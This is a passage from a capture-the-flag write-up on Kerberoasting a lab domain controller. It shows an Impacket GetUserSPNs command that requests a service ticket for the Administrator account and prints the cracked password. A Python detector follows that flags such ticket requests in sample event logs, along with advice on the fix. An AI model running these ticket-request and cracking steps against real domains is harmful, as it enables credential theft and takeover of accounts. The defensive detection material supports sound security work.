I’ll use the GetUserSPNs script from Impacket to list the service principal names (SPNs) that are associated with normal user accounts. With -request, it will also get a service ticket that I can crack.
➜ Active impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile userSpns.out
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 00:36:40.351723 2024-01-11 00:55:39.534151
[-] CCache file is not found. Skipping...
I got the administrator hash, and then cracked it with hashcat.
administrator:Ticketmaster1968
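On the domain controller, a service ticket request like the one above is logged as Security event 4769. The Python below is an added example, not part of the original write-up: it flags successful requests for user-account services that were issued with RC4 tickets, run over constructed sample events. The JSON-lines layout, the function names and the bulk threshold are assumptions.

```python
import json

# Constructed Security event 4769 records (Kerberos service ticket requested),
# flattened to JSON lines. Every value is made up for this example.
SAMPLE_EVENTS = """\
{"EventID": 4769, "TargetUserName": "alice@ACTIVE.HTB", "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.10", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.50", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "bob@ACTIVE.HTB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.11", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "bob@ACTIVE.HTB", "ServiceName": "sqlsvc", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.11", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "websvc", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.50", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.50", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "carol@ACTIVE.HTB", "ServiceName": "sqlsvc", "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:192.0.2.12", "Status": "0x20"}
"""

RC4_HMAC = 0x17  # etype 23: ticket key derives from the account password hash


def is_user_service(name):
    """Machine accounts ('$' suffix) and krbtgt have random keys; skip them."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def find_roast_candidates(lines, bulk_threshold=3):
    """Return (rc4_hits, bulk) for successful requests to user-account services."""
    rc4_hits, per_requester = [], {}
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue  # not a ticket request, or the request failed
        svc = ev["ServiceName"]
        if not is_user_service(svc):
            continue
        requester = ev["TargetUserName"].split("@")[0].lower()
        per_requester.setdefault(requester, set()).add(svc.lower())
        if int(ev["TicketEncryptionType"], 16) == RC4_HMAC:
            rc4_hits.append((requester, svc, ev["IpAddress"]))
    # One principal asking for tickets to several user-run services is unusual.
    bulk = {r: sorted(s) for r, s in per_requester.items() if len(s) >= bulk_threshold}
    return rc4_hits, bulk


if __name__ == "__main__":
    hits, bulk = find_roast_candidates(SAMPLE_EVENTS.splitlines())
    for requester, svc, ip in hits:
        print(f"RC4 ticket for user service {svc!r} requested by {requester} from {ip}")
    for requester, services in bulk.items():
        print(f"{requester} requested tickets for {len(services)} user services: {services}")
```

RC4 on its own is a heuristic, since legacy clients also request it. The underlying fix is a long random password or a managed service account for any user account that carries an SPN.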